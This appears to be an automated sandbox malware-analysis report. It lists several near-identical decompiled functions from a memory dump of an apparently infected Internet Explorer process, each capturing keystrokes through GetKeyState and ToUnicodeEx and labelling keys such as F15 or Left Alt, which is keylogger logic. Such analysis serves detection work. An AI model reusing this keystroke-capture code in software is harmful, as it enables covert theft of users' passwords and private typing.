ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Esc], xrefs: 00C85880
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D24, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D24(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Num Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Num Lock], xrefs: 00C85D26

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B04, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B04(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F15]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F15], xrefs: 00C85B06

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B6A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B6A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F20]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F20], xrefs: 00C85B6C
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8598E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8598E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Reset]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Reset], xrefs: 00C85990

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85BF2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BF2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F6]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F6], xrefs: 00C85BF4
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85CAD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CAD(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Left Alt]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

